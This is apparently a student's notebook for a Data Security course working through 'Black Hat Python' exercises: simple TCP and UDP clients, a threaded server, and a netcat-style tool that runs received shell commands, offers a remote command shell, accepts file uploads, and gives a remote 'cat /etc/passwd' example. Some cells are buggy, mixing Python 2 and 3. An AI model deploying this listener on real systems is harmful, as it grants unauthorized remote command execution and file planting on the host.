# <h1> Black Hat Python </h1>

## <h2>Data Security</h2>
    

### <span style="color:blue"> **Diana Aimeé Gutiérrez May /  160300115**</span>
<p>Febrero 26, 2021</p>

## <span style="color:blue"> **Código: #1**</span>

In [8]:
def sum(number_one, number_two):
    number_one_int = convert_integer(number_one)
    number_two_int = convert_integer(number_two)
    
    result = number_one_int + number_two_int
    
    return result


def convert_integer(number_string):
    
    convert_integer = int(number_string)
    print("Se ha convertido", f"{type(number_string)}" "   a->   " f"{type(convert_integer)}")
    
    return convert_integer

In [9]:
p1_answer = sum("1","2")
p1_answer

Se ha convertido <class 'str'>   a->   <class 'int'>
Se ha convertido <class 'str'>   a->   <class 'int'>


3

In [10]:
p2_answer = sum("1998", "1994")
p2_answer

Se ha convertido <class 'str'>   a->   <class 'int'>
Se ha convertido <class 'str'>   a->   <class 'int'>


3992

## <span style="color:blue"> **Código TCP CLIENT: #2**</span>

In [11]:
import socket

In [12]:
target_host = "www.google.com"
target_port = 80

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client.connect((target_host, target_port))

data_client = "GET / HTTP/1.1\r\nHost: google.com\r\n\r\n"
client.send(data_client.encode('utf-8'))

response = client.recv(4096)
print(response)

b'HTTP/1.1 301 Moved Permanently\r\nLocation: http://www.google.com/\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Sat, 27 Feb 2021 02:05:49 GMT\r\nExpires: Mon, 29 Mar 2021 02:05:49 GMT\r\nCache-Control: public, max-age=2592000\r\nServer: gws\r\nContent-Length: 219\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">\n<TITLE>301 Moved</TITLE></HEAD><BODY>\n<H1>301 Moved</H1>\nThe document has moved\n<A HREF="http://www.google.com/">here</A>.\r\n</BODY></HTML>\r\n'


## <span style="color:blue"> **Código UDP CLIENT: #3**</span>

In [13]:
target_host = "127.0.0.1"
target_port = 80

client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.bind((target_host, target_port))

data = "Aimee"
client.sendto(data.encode('utf-8'), (target_host, target_port))

data, addr = client.recvfrom(4096)

print(data)
print(addr)

b'Aimee'
('127.0.0.1', 80)


## <span style="color:blue"> **Código TCP Server: #4**</span>

In [14]:
import threading

In [ ]:
bind_ip = "127.0.0.1"
bind_port = 9999

tcp_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

tcp_server.bind((bind_ip, bind_port))

tcp_server.listen(5)



def handle_client(client_socket):
    
    # send something
    client_socket.send("Connected\r\n")
    
    data = socket.recv(4096)    
    print ("[*] Reveived: %s", {data})
    
    # send back a packet
    client_socket.send(b"ACK")
    
    client_socket.close()
    
while True:
    client_socket, addr = tcp_server.accept()
    
    print ("[*] Accepted connection from: %s:%d" % (addr[0], addr[1]))
    
    # spin up our client thread to handle incoming data
    client_handler = threading.Thread(target=handle_client,args=(client_socket,))
    client_handler.start()

## <span style="color:blue"> **Código TCP Server: #**</span>

In [ ]:
import sys
import socket
import getopt
import threading
import subprocess

In [ ]:
# define some global variables
listen             = False
command            = False
upload             = False
execute            = ""
target             = ""
upload_destination = ""
port               = 0

# this runs a command and returns the output
def run_command(command):
        
        # trim the newline
        command = command.rstrip()
        
        # run the command and get the output back
        try:
                output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
        except:
                output = "Failed to execute command.\r\n"
        
        # send the output back to the client
        return output

# this handles incoming client connections
def client_handler(client_socket):
        global upload
        global execute
        global command
        
        # check for upload
        if len(upload_destination):
                
                # read in all of the bytes and write to our destination
                file_buffer = ""
                
                # keep reading data until none is available
                while True:
                        data = client_socket.recv(1024)
                        
                        if not data:
                                break
                        else:
                                file_buffer += data
                                
                # now we take these bytes and try to write them out
                try:
                        file_descriptor = open(upload_destination,"wb")
                        file_descriptor.write(file_buffer)
                        file_descriptor.close()
                        
                        # acknowledge that we wrote the file out
                        client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
                except:
                        client_socket.send("Failed to save file to %s\r\n" % upload_destination)
                        
                
        
        # check for command execution
        if len(execute):
                
                # run the command
                output = run_command(execute)
                
                client_socket.send(output)
        
        
        # now we go into another loop if a command shell was requested
        if command:
                
                while True:
                        # show a simple prompt
                        client_socket.send("<BHP:#> ")
                        
                        # now we receive until we see a linefeed (enter key)
                        cmd_buffer = ""
                        while "\n" not in cmd_buffer:
                                cmd_buffer += client_socket.recv(1024)
                
                        
                        # we have a valid command so execute it and send back the results
                        response = run_command(cmd_buffer)
                        
                        # send back the response
                        client_socket.send(response)
        
# this is for incoming connections
def server_loop():
        global target
        global port
        
        # if no target is defined we listen on all interfaces
        if not len(target):
                target = "0.0.0.0"
                
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.bind((target,port))
        
        server.listen(5)        
        
        while True:
                client_socket, addr = server.accept()
                
                # spin off a thread to handle our new client
                client_thread = threading.Thread(target=client_handler,args=(client_socket,))
                client_thread.start()
                

# if we don't listen we are a client....make it so.
def client_sender(buffer):
        
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                
        try:
                # connect to our target host
                client.connect((target,port))
                
                # if we detect input from stdin send it 
                # if not we are going to wait for the user to punch some in
                
                if len(buffer):
                        
                        client.send(buffer)
                
                while True:
                        
                        # now wait for data back
                        recv_len = 1
                        response = ""
                        
                        while recv_len:
                                data     = client.recv(4096)
                                recv_len = len(data)
                                response+= data
                                
                                if recv_len < 4096:
                                        break
                        
                        print response, 
                        
                        # wait for more input
                        buffer = raw_input("")
                        buffer += "\n"                        
                        
                        # send it off
                        client.send(buffer)
                        
                
        except:
                # just catch generic errors - you can do your homework to beef this up
                print "[*] Exception! Exiting."
                
                # teardown the connection                  
                client.close()  
                        
                        
        

def usage():
        print "Netcat Replacement"
        print
        print "Usage: bhpnet.py -t target_host -p port"
        print "-l --listen                - listen on [host]:[port] for incoming connections"
        print "-e --execute=file_to_run   - execute the given file upon receiving a connection"
        print "-c --command               - initialize a command shell"
        print "-u --upload=destination    - upon receiving connection upload a file and write to [destination]"
        print
        print
        print "Examples: "
        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
        print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
        sys.exit(0)


def main():
        global listen
        global port
        global execute
        global command
        global upload_destination
        global target
        
        if not len(sys.argv[1:]):
                usage()
                
        # read the commandline options
        try:
                opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
        except getopt.GetoptError as err:
                print str(err)
                usage()
                
                
        for o,a in opts:
                if o in ("-h","--help"):
                        usage()
                elif o in ("-l","--listen"):
                        listen = True
                elif o in ("-e", "--execute"):
                        execute = a
                elif o in ("-c", "--commandshell"):
                        command = True
                elif o in ("-u", "--upload"):
                        upload_destination = a
                elif o in ("-t", "--target"):
                        target = a
                elif o in ("-p", "--port"):
                        port = int(a)
                else:
                        assert False,"Unhandled Option"
        

        # are we going to listen or just send data from stdin
        if not listen and len(target) and port > 0:
                
                # read in the buffer from the commandline
                # this will block, so send CTRL-D if not sending input
                # to stdin
                buffer = sys.stdin.read()
                
                # send data off
                client_sender(buffer)   
        
        # we are going to listen and potentially 
        # upload things, execute commands and drop a shell back
        # depending on our command line options above
        if listen:
                server_loop()

main()  